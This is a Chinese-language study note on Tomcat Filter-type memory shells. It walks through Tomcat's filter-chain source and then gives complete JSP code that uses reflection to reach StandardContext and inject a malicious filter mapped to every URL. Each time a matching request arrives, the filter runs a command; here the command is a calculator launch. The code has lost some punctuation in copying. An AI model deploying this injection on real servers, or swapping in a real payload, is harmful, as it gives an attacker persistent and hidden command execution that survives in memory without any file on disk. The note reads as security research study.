Filter内存马源码学习首先写一个普通的Filter了解一下重点数据的传递过程断点到内部的一行往上找。回到的是org.apache.catalina.core.ApplicationFilterChain#internalDoFilter这部分找到filters找filters的赋值的地方找到ApplicationFilterChain#addFilter有两个被调用的地方很近随便点一个现在我们在ApplicationFilterFactory#createFilterChain观察一下逻辑遍历filtermaps找到对应name的config加进filterChain。现在的重点关注对象就是两个数据filterConfig和filterMaps都是从StandardContext获取的去看StandardContext中的这两个数据。先看filterConfigs的赋值的地方找到StandardContext#filterStart观察filterConfig的KV就是来自filterDefs。也就是说在filterDefs放入数据后再调用filterStart就可以实现filterConfig的赋值。再看filterMaps一样的方法发现都出了StandardContext了直接在StandardContext里改值就行了编写思路写一个恶意filter类拿到StandardContextfilterDefs加一个值filterMaps加一个值调用filterStart方法注要先加filterDef再加filterMap因为加filterMap时会先验证filterDef中有没有没有会抛异常访问这个jsp页面后filter会被加载到内存中再次发出符合filter过滤条件的请求时将触发恶意的TomcatFilterShell#doFilter完整代码% page importjava.io.IOException % % page importorg.apache.catalina.core.StandardContext % % page importjava.lang.reflect.Field % % page importorg.apache.tomcat.util.descriptor.web.FilterMap % % page importorg.apache.tomcat.util.descriptor.web.FilterDef % % page importorg.apache.catalina.core.ApplicationContext %%-- %--一个恶意filter类--% % page contentTypetext/html;charsetUTF-8 languagejava % %! public class TomcatFilterShell implements Filter { Override public void init(FilterConfig filterConfig) throws ServletException { System.out.println(AddTomcatFilter initialized); } Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { Runtime.getRuntime().exec(open -a Calculator);//macos chain.doFilter(request, response); } Override public void destroy() { System.out.println(AddTomcatFilter destroyed); } } % % try{ String filterName filterShell; // 1.从request中获取servletContext ServletContext servletContext request.getServletContext(); // 从servletContext中获取applicationContext Field applicationContextField servletContext.getClass().getDeclaredField(context); applicationContextField.setAccessible(true); ApplicationContext applicationContext (ApplicationContext) applicationContextField.get(servletContext); // 从applicationContext中获取standardContext Field standardContextField applicationContext.getClass().getDeclaredField(context); standardContextField.setAccessible(true); StandardContext standardContext (StandardContext) standardContextField.get(applicationContext); // 2、filterDef加入值 FilterDef filterDef new FilterDef(); filterDef.setFilterName(filterName); filterDef.setFilterClass(TomcatFilterShell.class.getName()); filterDef.setFilter(new TomcatFilterShell()); standardContext.addFilterDef(filterDef); standardContext.addFilterDef(filterDef); // 3、filterMaps加入值 FilterMap filterMap new FilterMap(); filterMap.setFilterName(filterName); filterMap.addURLPattern(/*); standardContext.addFilterMapBefore(filterMap); // 4、调用filterStart方法 standardContext.filterStart(); out.println(Filter注入成功); }catch (Exception e){ e.printStackTrace(); out.println(Filter注入失败); } %参考内容https://su18.org/post/memory-shell/https://www.bilibili.com/video/BV1HaGPzcENy